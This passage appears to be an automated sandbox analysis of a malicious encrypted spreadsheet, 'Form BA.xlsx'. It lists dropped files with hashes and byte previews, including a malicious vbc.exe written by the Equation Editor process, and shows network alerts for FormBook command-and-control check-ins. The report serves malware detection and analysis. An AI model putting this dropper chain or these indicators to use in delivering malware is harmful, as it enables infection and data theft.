                                                                                                                                                  Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................z$.....O.-z.z.@P.%.....O...O.....0.O...O..N5P0.O.(.O.......O...O..N5P0.O.(.O. ....y.z(.O.0.O. ............z.z............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i.............O.X...(.O.\.O............vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1FF01E4.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):85020
                                                                                                                                                  Entropy (8bit):7.2472785111025875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2827BAF.emf
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):7608
                                                                                                                                                  Entropy (8bit):5.084398854528001
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:+SFvbLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Fvw+sW31RGtdVDYM3VfmkpH
                                                                                                                                                  MD5:47A28CB161396FA7C67E39A74619C8CD
                                                                                                                                                  SHA1:B65196123279EE71D31E2C3D23B98937096F08F1
                                                                                                                                                  SHA-256:BB9E78C91679C8FCC51849CCED0EE7E7CE680E9249A2B074A681AAC1D7379DDC
                                                                                                                                                  SHA-512:99882C47315A1209104BE1C0CE49391B9AD9A04C8480297FF6E30C1D8ECEBC4EF3F3557869E685D5CA37879CA96B4F398514367AE73777AE3433C19505352797
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I..................................................._.6.).X...x.#.d.......................@......p....\......................p.........6Pv...p....`..p.`_.$y.v.]v...8............v..v.$.......d.......$....^.p.....^.px[v..]v.Prf...8.-........<.v................<.>v.Z.v....X.bS.....`_........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F1ED9AE7.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):94963
                                                                                                                                                  Entropy (8bit):7.9700481154985985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                  MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso37B6.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso37B7.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso37B8.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE743.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE773.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE774.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                                                                                  C:\Users\user\Desktop\~$Form BA.xlsx
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):330
                                                                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  C:\Users\Public\vbc.exe
                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):713216
                                                                                                                                                  Entropy (8bit):7.571021299706813
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:BUEnk8yfaR+DaY3bsojKdqFyirJ5Y1oDpgAwUzl3XoJPcISRqzGWl06bsyaUVKnp:KEnkZCR+ZjKYjrw1o1H73XwPcIll/bz6
                                                                                                                                                  MD5:734A568749C7879E5CA5EA2B8E082F5E
                                                                                                                                                  SHA1:27D6276E49602F3633DFDD94DE400DB53E209B51
                                                                                                                                                  SHA-256:D0F6F28C586B78DFBC7D4E6C277C20761C9DB38E0CD059807BE5252B52D10660
                                                                                                                                                  SHA-512:012E2122B51055DD011341E629890F3D7B9D3D8CE6984D62EDD287C625634C01B5FB7D220002C79D5E53EBF089FEE5C505B48FDCBE89951BEB36D0A92E9B96E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.................. ........@.. .......................@............@.................................|...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........p...........L...0)...........................................0............( ...(!.........(.....o"....*.....................(#......($......(%......(&......('....*N..(....oE...((....*&..()....*.s*........s+........s,........s-........s.........*....0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0..<........~.....(4.....,!r...p.....(5...o6...s7............~.....+..*.0......

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:CDFV2 Encrypted
                                                                                                                                                  Entropy (8bit):7.993957532893648
                                                                                                                                                  TrID:
                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                  File name:Form BA.xlsx
                                                                                                                                                  File size:1277440
                                                                                                                                                  MD5:f683a8eb2e17866a194af9b23efda095
                                                                                                                                                  SHA1:b3002f93d24336a9af003a7a3da36217a7d7b8db
                                                                                                                                                  SHA256:e6de55ef568521e22566496d9df49eb1a4cf2ea94082d8d0bcd357f41d2962ef
                                                                                                                                                  SHA512:7d61feb01d5ab561848c500232cefa553b6ef818487ef8361e13f32b00d8340425a93f518e867e449d689d1a2f3dfb4136ed9c9380c03fde7e72acf86e55716a
                                                                                                                                                  SSDEEP:24576:8eZrCoZjO0Z3LTlr6QoKZavurFhXI7EUMYcSNk5TIwrgm80Wa4+W3xBK8Gom9KvE:VZrCf0Z3d2e0urFhbpYBNk5T9q0bohBA
                                                                                                                                                  File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OLE
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "Form BA.xlsx"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:False
                                                                                                                                                  Application Name:unknown
                                                                                                                                                  Encrypted Document:True
                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                  Contains Workbook/Book Stream:False
                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:False

                                                                                                                                                  Streams

                                                                                                                                                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:64
                                                                                                                                                  Entropy:2.73637206947
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                  Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:112
                                                                                                                                                  Entropy:2.7597816111
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                  Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:200
                                                                                                                                                  Entropy:3.13335930328
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/Version
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:76
                                                                                                                                                  Entropy:2.79079600998
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 1263144
                                                                                                                                                  General
                                                                                                                                                  Stream Path:EncryptedPackage
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:1263144
                                                                                                                                                  Entropy:7.99876353791
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:. F . . . . . . ! 4 , t . . . . w . . . T . / . l / F s . . ? . . . . G . Q . # . . + . 3 _ & . . 7 ^ . , . . . . \\ Q . . . . . . D . . / | . . . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . . D . J . . . . r . . . . . f . .
                                                                                                                                                  Data Raw:18 46 13 00 00 00 00 00 21 34 2c 74 f0 df 0f b2 77 dc 9f 8a 54 c0 2f 9a 6c 2f 46 73 b2 a2 3f bc 9b b8 a1 47 85 51 d6 23 04 9a 2b b7 33 5f 26 be 1d 37 5e b5 2c fe a2 c9 09 5c 51 b8 15 0d c5 d2 8f 44 f4 f4 2f 7c 00 80 8c d3 a4 dd c7 66 dc cd 44 d5 4a b4 c3 c4 e2 72 8c d3 a4 dd c7 66 dc cd 44 d5 4a b4 c3 c4 e2 72 8c d3 a4 dd c7 66 dc cd 44 d5 4a b4 c3 c4 e2 72 8c d3 a4 dd c7 66 dc cd
                                                                                                                                                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                  General
                                                                                                                                                  Stream Path:EncryptionInfo
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:224
                                                                                                                                                  Entropy:4.62639518968
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . = . . . . . . . % ] . . . . . C . N . . . . w . . . _ . . . . . . . . ) . ? [ k . . p . . . . W . . . . . P . . . X . . . . . . v . .
                                                                                                                                                  Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                  Network Behavior

                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  07/22/21-17:16:43.686728TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.22151.101.0.119
                                                                                                                                                  07/22/21-17:16:43.686728TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.22151.101.0.119
                                                                                                                                                  07/22/21-17:16:43.686728TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.22151.101.0.119
                                                                                                                                                  07/22/21-17:16:51.093327ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jul 22, 2021 17:15:02.746526003 CEST4916580192.168.2.223.121.113.175
